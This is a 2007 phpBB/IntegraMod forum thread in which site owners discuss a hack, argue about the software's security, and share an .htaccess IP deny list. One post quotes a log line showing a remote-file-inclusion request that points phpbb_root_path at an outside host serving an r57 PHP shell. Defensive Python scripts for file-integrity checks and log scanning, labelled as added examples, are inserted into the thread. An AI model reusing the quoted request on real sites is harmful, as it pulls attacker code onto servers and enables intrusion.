Hacked again


PostAuthor: WAM » Wed Jul 18, 2007 9:33 pm

Your phpBB Version: 2.0.
phpBB Type: Integramod 141
MODs: No
Your knowledge: Advanced Knowledge
Board URL: http://www.worldandme.net

PHP Version:
MySQL Version:


What was done before the problem appeared?
out of the box install


What was done to try to solve the problem?
nothing yet



Description and Message

Today my site http://www.worldandme.net was hacked and redirects to http://208.101.34.12/~a7larab/usuud_alharb.ram

WAM

PostAuthor: Joshie » Wed Jul 18, 2007 9:55 pm

Sadly, what saddens me is that integramod is easily hacked.

PostAuthor: WAM » Wed Jul 18, 2007 9:57 pm

Any idea what to do now? I'm going for a plain phpbb without mods and a static website!

PostAuthor: WAM » Wed Jul 18, 2007 10:01 pm

I'll check it out... but for now the dog needs a walk.

PostAuthor: Helter » Thu Jul 19, 2007 12:00 am

"Joshie";p="27399" wrote:Sadly, what saddens me is that integramod is easily hacked.

This is a really dumb statement from someone who circumvented as many security features as possible. Integramod is much less likely to be hacked than vanilla phpbb.

PostAuthor: Joshie » Thu Jul 19, 2007 5:29 am

"HelterSkelter";p="27408" wrote:"Joshie";p="27399" wrote:Sadly, what saddens me is that integramod is easily hacked.

;) Be sure to leave a little note in the download files to warn them that integramod is easy to hack. Look around: a few people have stated that their site got hacked and the only script was integramod.

PostAuthor: DjPorkchop » Thu Jul 19, 2007 5:38 am

That statement is just a tad on the wrong side, Joshie. I have run integramod 1.4.1 since the day it was released and have yet to be hacked. I have also NOT commented out any of the security features at all. They are there for a reason. The problem is not Integramod, it is phpBB. For years since it came out, it has been VERY hackable. In retrospect to the one or two people that have reported a hack lately, it's not nearly as bad as the amount that was getting hit with the last version. Security updates were a very major thing in this update to make it not so "easily" hackable.

Leave Cracker Tracker as it was out of the box and use the update patch provided, and keep phpBB security in place and there won't be any issues.

It's not completely fair at all to bash a script that is offered to use for FREE, that these kind folks here have put HUNDREDS and HUNDREDS of hours of their own time into when they could have been off doing their own family thing or something else. Minus a few bugs that I'm quite sure will be worked out in the next release, it is a VERY stable script.

Reinstall all of your security features, then come back in a month and tell us how many times you got hacked. And when you do, don't bash, but explain what happened and what files were affected and all the pertinent info that you can provide so they can get on it as quick as they can. Bashing gets us nowhere real fast. Please be part of the solution and not part of the problem.

PostAuthor: WAM » Thu Jul 19, 2007 6:02 am

I had the script out of the box and got hacked 2 times within 3 weeks!

My solution: never ever Integramod!

Andrea

PostAuthor: viragotech » Thu Jul 19, 2007 7:03 am

No code is 100% unhackable. Not even MS or Apple can make a 100% secure code with all the money they have to fund projects.

Plus you're just lucky or unlucky. Everyone gets hacked like everyone gets a cold. Doesn't happen to everyone at once, but sooner or later a bug gets through. But it has very little to do with IM, it's the core phpBB program.

Folks here did not invent phpBB, they just build off of it. Go fuss at the phpBB forum.

PostAuthor: Helter » Thu Jul 19, 2007 4:58 pm

Hondas are bad cars because they crash! Same logic.
We have had maybe a dozen posts about hacked forums in the last few years since I've been involved with IM. In that same time period there have been hundreds of "I've been hacked" posts on phpbb. Go to any open source or free forum site and count the posts.
Joshie, if you had any self-esteem, you would be thoroughly embarrassed by your post. You have only been here a short time and you have requested more help than most members who have been here for years - and you have received it. Many members have given you a lot of their time, and I can't even find a thank you from you to them, yet as soon as you let someone in your back door, you're here slamming the project.
Funny thing is, you have a freelancer website. Do you know what a freelancer is? A freelancer is a developer for hire. Anyone running a freelancer website, or even being a member of one, should be able to do their own setup, bug fixing, and feature integration. If not, they should at the very least be aware that PHP is INSECURE. Therefore ANY software designed to run on it is subject to the same insecurities.

PostAuthor: Joshie » Thu Jul 19, 2007 7:56 pm

"HelterSkelter";p="27421" wrote:Hondas are bad cars because they crash! Same logic.
We have had maybe a dozen posts about hacked forums in the last few years since I've been involved with IM. In that same time period there have been hundreds of "I've been hacked" posts on phpbb. Go to any open source or free forum site and count the posts.
Joshie, if you had any self-esteem, you would be thoroughly embarrassed by your post. You have only been here a short time and you have requested more help than most members who have been here for years - and you have received it. Many members have given you a lot of their time, and I can't even find a thank you from you to them, yet as soon as you let someone in your back door, you're here slamming the project.
Funny thing is, you have a freelancer website. Do you know what a freelancer is? A freelancer is a developer for hire. Anyone running a freelancer website, or even being a member of one, should be able to do their own setup, bug fixing, and feature integration. If not, they should at the very least be aware that PHP is INSECURE. Therefore ANY software designed to run on it is subject to the same insecurities.

Yet, that means don't consider me a freelancer. I just opened the website for freelancers to communicate with other webmasters/freelancers.

And please open your eyes: I have thanked people for their work. You can even ask breck (quack major.pain), because I thanked him for the work, and some other people too. Why would I want to thank someone who didn't solve the problems I had? Nah, I am not embarrassed. I mean, I do like integramod. I am just giving an honest complaint. If someone, or you, makes integramod with less chance of getting hacked, then that's great! That would basically be a better script than any others.

PostAuthor: Helter » Thu Jul 19, 2007 9:46 pm

As I've said before, it is not possible to make hack proof software. Look at Adobe with their bottomless bank accounts. They cannot keep ppl from hacking their registration codes and illegally using their software. The fact is, if you are popular, you're in the spotlight, and phpbb is very popular. This gets the attention of all the hackers and the wannabe famous script kiddies. Welcome to the web.

ps... the fact that you're not embarrassed says a lot about you...

PostAuthor: Joshie » Thu Jul 19, 2007 11:43 pm

"WAM";p="27415" wrote:I had the script out of the box and got hacked 2 times within 3 weeks!

My solution: never ever Integramod!

Andrea

Lol!

"HelterSkelter";p="27436" wrote:As I've said before, it is not possible to make hack proof software. Look at Adobe with their bottomless bank accounts. They cannot keep ppl from hacking their registration codes and illegally using their software. The fact is, if you are popular, you're in the spotlight, and phpbb is very popular. This gets the attention of all the hackers and the wannabe famous script kiddies. Welcome to the web.

ps... the fact that you're not embarrassed says a lot about you...

Ah, that explains a lot about "this gets the attention of all the hackers".

What do you mean? The fact that I am not embarrassed says a lot about me?

But, however, I apologize for snapping. I just didn't like it when the site gets hacked.

:D

PostAuthor: viragotech » Fri Jul 20, 2007 2:59 am

hehehehehe

Case in point, one of my other fav forums:

http://bpgforums.com/

It's hacked n defaced as I type.
It's not an IM forum BTW. It's fancy pricey vBulletin.

PostAuthor: Joshie » Fri Jul 20, 2007 3:19 am

"MWE_001";p="27413" wrote:That statement is just a tad on the wrong side, Joshie. I have run integramod 1.4.1 since the day it was released and have yet to be hacked. I have also NOT commented out any of the security features at all. They are there for a reason. The problem is not Integramod, it is phpBB. For years since it came out, it has been VERY hackable. In retrospect to the one or two people that have reported a hack lately, it's not nearly as bad as the amount that was getting hit with the last version. Security updates were a very major thing in this update to make it not so "easily" hackable.

Leave Cracker Tracker as it was out of the box and use the update patch provided, and keep phpBB security in place and there won't be any issues.

It's not completely fair at all to bash a script that is offered to use for FREE, that these kind folks here have put HUNDREDS and HUNDREDS of hours of their own time into when they could have been off doing their own family thing or something else. Minus a few bugs that I'm quite sure will be worked out in the next release, it is a VERY stable script.

Reinstall all of your security features, then come back in a month and tell us how many times you got hacked. And when you do, don't bash, but explain what happened and what files were affected and all the pertinent info that you can provide so they can get on it as quick as they can. Bashing gets us nowhere real fast. Please be part of the solution and not part of the problem.

Does any one of you have a patch for the security update? That might be the problem, because I don't see the patch for the updates anywhere.

PostAuthor: .QUACK.Major.Pain » Fri Jul 20, 2007 4:45 am

There was a patch a while back.

If there has been a more recent one, I haven't seen it.

A suggestion would be that patches be posted separately as a sticky. The last CT update was hidden inside another post and I didn't know it was there until I read the whole thing.

Updates should also be known and promoted. A mass email to everyone of an update with a link to the download would be appreciated.

Thanks lads n gals!!

PostAuthor: CaNNon » Fri Jul 20, 2007 7:29 am

I don't get how going to plain php will help. I mean, you've gone from a software that has 2 security systems to none?

I had my site defaced once since I started with IM, and using CT's file checker to id the 2 changed files I had the site back up in 2 minutes. I just ftp copies of the changed files from my off site backup.

3 biggest things you have to do no matter what you run: keep an up-to-date ftp backup, learn to use .htaccess and chmod permissions.
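
The recovery described in the post above (identify the changed files, then restore only those from an off-site backup) can be scripted. This is an added example, not part of the original post and not Cracker Tracker's own file checker; comparing SHA-256 hashes against a known-good manifest is an assumption about how to detect changes, and the file names in the demo are constructed.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def build_manifest(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file() and not p.is_symlink()}

def diff_manifests(baseline, current):
    """Compare a known-good manifest with the live tree's manifest."""
    shared = baseline.keys() & current.keys()
    return {"changed": sorted(p for p in shared if baseline[p] != current[p]),
            "added": sorted(current.keys() - baseline.keys()),  # unexpected files: review by hand
            "removed": sorted(baseline.keys() - current.keys())}

def restore_from_backup(backup_root, live_root, baseline, report):
    """Copy changed/removed files back, but only if the backup copy matches the baseline."""
    restored, skipped = [], []
    for rel in report["changed"] + report["removed"]:
        src, dst = Path(backup_root) / rel, Path(live_root) / rel
        if not src.is_file() or sha256_of(src) != baseline[rel]:
            skipped.append(rel)  # backup missing or itself altered: do not trust it
            continue
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(src, dst)
        restored.append(rel)
    return restored, skipped

if __name__ == "__main__":
    # Constructed demo tree: two PHP files, then a simulated defacement.
    with tempfile.TemporaryDirectory() as tmp:
        live, backup = Path(tmp, "live"), Path(tmp, "backup")
        for root in (live, backup):
            root.mkdir()
            (root / "index.php").write_text("<?php // original index\n")
            (root / "viewtopic.php").write_text("<?php // original viewtopic\n")
        baseline = build_manifest(live)  # taken while the site is known good
        (live / "index.php").write_text("<?php // defaced\n")
        (live / "dropped.php").write_text("<?php // not part of the install\n")
        report = diff_manifests(baseline, build_manifest(live))
        print("report:", report)
        print("restored, skipped:", restore_from_backup(backup, live, baseline, report))
        print("after restore:", diff_manifests(baseline, build_manifest(live)))
```

Files listed under "added" are deliberately left in place for inspection, and the manifest itself should be stored off the web server so it cannot be rewritten along with the site.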


PostAuthor: Helter » Fri Jul 20, 2007 5:42 pm

".=QUACK=.Major.Pain";p="27450" wrote:There was a patch a while back.

If there has been a more recent one, I haven't seen it.

A suggestion would be that patches be posted separately as a sticky. The last CT update was hidden inside another post and I didn't know it was there until I read the whole thing.

Updates should also be known and promoted. A mass email to everyone of an update with a link to the download would be appreciated.

Thanks lads n gals!!

These ctracker patches released so far do not add any additional security, they only allow admins to make more changes to their boards without the dreaded CTracker block. Any important security patches will definitely be stickied, and if it is a critical patch, it will appear in your ACP index in the Integramod news section.

PostAuthor: .QUACK.Major.Pain » Fri Jul 20, 2007 6:10 pm

Cool good to know.

I knew the CT was for all the errors.

PostAuthor: viragotech » Fri Jul 20, 2007 7:09 pm

wish it could block commands like this

"phpbb_root_path="

74.52.9.162 - - [19/Jul/2007:23:57:29 -0400] "GET /link_main.php?phpbb_root_path=http://usuarios.lycos.es/magoop/r57.txt?? HTTP/1.1" 403 - "-" "libwww-perl/5.805"

My site keeps getting shut down for too much traffic, but it's not my users. It's the hackers trying desperately to hack in, but they can't. And blocking domains or IPs doesn't work, as daily it's different ones. Never the same ones each day.

I got log files 10 miles long and most of it is hackers tryin n tryin to get in. They can't, but they won't stop either.
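
The request in the log line above has a signature that does not depend on the source address: a query parameter whose value is itself a remote URL. The following is an added example, not part of the original posts, that parses Apache combined-format lines and reports which parameters are targeted, from how many addresses, and whether any such request was served instead of refused. The sample lines, IPs, host names and the path /mod_example.php are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache "combined" log format, as in the line quoted in the post above.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is a remote URL is the include-attempt signature.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IPs, .invalid hosts, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Jul/2007:23:57:29 -0400] "GET /link_main.php?phpbb_root_path=http://files.example.invalid/r.txt?? HTTP/1.1" 403 - "-" "libwww-perl/5.805"',
    '203.0.113.20 - - [20/Jul/2007:01:12:03 -0400] "GET /mod_example.php?phpbb_root_path=http%3A%2F%2Ffiles.example.invalid%2Fr.txt%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '192.0.2.99 - - [20/Jul/2007:02:40:11 -0400] "GET /link_main.php?phpbb_root_path=FTP://files.example.invalid/r.txt HTTP/1.1" 403 - "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [20/Jul/2007:08:30:00 -0400] "GET /viewtopic.php?t=1234&start=15 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [20/Jul/2007:08:31:10 -0400] "GET /login.php?redirect=index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

def find_remote_include_attempts(lines):
    """Return one record per request that passes a remote URL as a parameter value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({"ip": m["ip"], "path": path, "param": name,
                             "status": int(m["status"]), "ua": m["ua"]})
                break
    return hits

def summarize(hits):
    """Group hits by parameter name: request count, distinct sources, unrefused requests."""
    summary = defaultdict(lambda: {"requests": 0, "sources": set(), "not_blocked": []})
    for h in hits:
        entry = summary[h["param"]]
        entry["requests"] += 1
        entry["sources"].add(h["ip"])
        if h["status"] < 400:
            # served rather than refused: check that script by hand
            entry["not_blocked"].append((h["ip"], h["path"]))
    return dict(summary)

if __name__ == "__main__":
    for param, e in summarize(find_remote_include_attempts(SAMPLE_LOG)).items():
        print(param, e["requests"], "requests from", len(e["sources"]),
              "addresses; not blocked:", e["not_blocked"])
```

A status below 400 only means the server answered the request; it does not by itself show that the remote file was included, so each such path still has to be reviewed.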


PostAuthor: CaNNon » Sat Jul 21, 2007 7:43 am

So you're banning the IP of the prox server each time in your .htaccess file?

And that part of the .htaccess file looks something like this?


# prox banning
# Banned Ip's (re: scripts run give active prox ip's)
# date bans (as prox will become useless in time)
order allow,deny
# july 16/07
deny from 91.121.14.227
# july 15/07
deny from 87.106.61.17
deny from 69.132.66.205
# pre july 12/07
deny from 38.99.44.103
deny from 66.199.227.66
deny from 72.29.94.232
deny from 75.126.70.242
deny from 81.169.178.78
deny from 81.223.85.66
deny from 84.19.188.111
deny from 87.233.134.199
deny from 189.5.160.101
deny from 195.140.142.113
deny from 195.199.227.210
deny from 200.103.160.149
deny from 200.215.129.70
deny from 201.66.46.225
deny from 216.120.237.36
deny from 216.222.193.2
allow from all


Because doing it this way they get a 400 type error and don't get to the site.
That's my last week's additions. I was getting hit as much as 20 times from one working prox and each time they would try a different script.